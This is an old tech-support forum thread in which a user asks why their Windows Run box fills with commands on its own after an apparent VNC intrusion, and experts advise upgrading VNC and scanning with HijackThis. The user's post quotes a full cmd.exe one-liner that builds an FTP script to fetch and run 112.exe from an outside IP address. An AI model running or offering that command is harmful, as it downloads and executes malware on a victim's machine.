Solved

Run window being auto populated by someone/thing else

Posted on 2006-11-05
4
269 Views
Last Modified: 2013-12-04
Hello

I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something

This is the command line :

cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit

I downloaded these programs against  rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
0
Comment
Question by:calvinnhobbes
  • 2
4 Comments
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 500 total points
Comment Utility
0
 
LVL 26

Expert Comment

by:DireOrbAnt
Comment Utility
Yes, you need to update your VNC. However, you probably have some trojan on your computer already.
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis

And remove anything suspicious. Do this after upgrading VNC.
0
 
LVL 38

Expert Comment

by:Rich Rumble
Comment Utility
What was the solution ultimately to your issue? Did kaspersky detect this, if so, what was the name it came up with? i think this info can help others that are having these issues.
Thanks!
-rich
0
 

Author Comment

by:calvinnhobbes
Comment Utility
kaspersky didnt find anything, but i have done the upgrade from the free version to the professional version of VNC viewer and the  problem has gone. Hijackthis didnt find anything as well. I'm still afraid that the trojan or whatever is still in my system.
davide
0

Featured Post

What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

Join & Write a Comment

As I write this article, I am finishing cleanup from the Qakbot virus variant found in the wild on April 18, 2011.  It was a messy beast that had varying levels of infection, speculated as being dependent on how long it resided on the infected syste…
Recently, I read that Microsoft has analysed statistics for their security intelligence report. It revealed: still, the clear majority of windows users do their daily work as administrator. An administrative account is a burden, security-wise. My ar…
Get a first impression of how PRTG looks and learn how it works.   This video is a short introduction to PRTG, as an initial overview or as a quick start for new PRTG users.
In this tutorial you'll learn about bandwidth monitoring with flows and packet sniffing with our network monitoring solution PRTG Network Monitor (https://www.paessler.com/prtg). If you're interested in additional methods for monitoring bandwidt…

771 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

14 Experts available now in Live!

Get 1:1 Help Now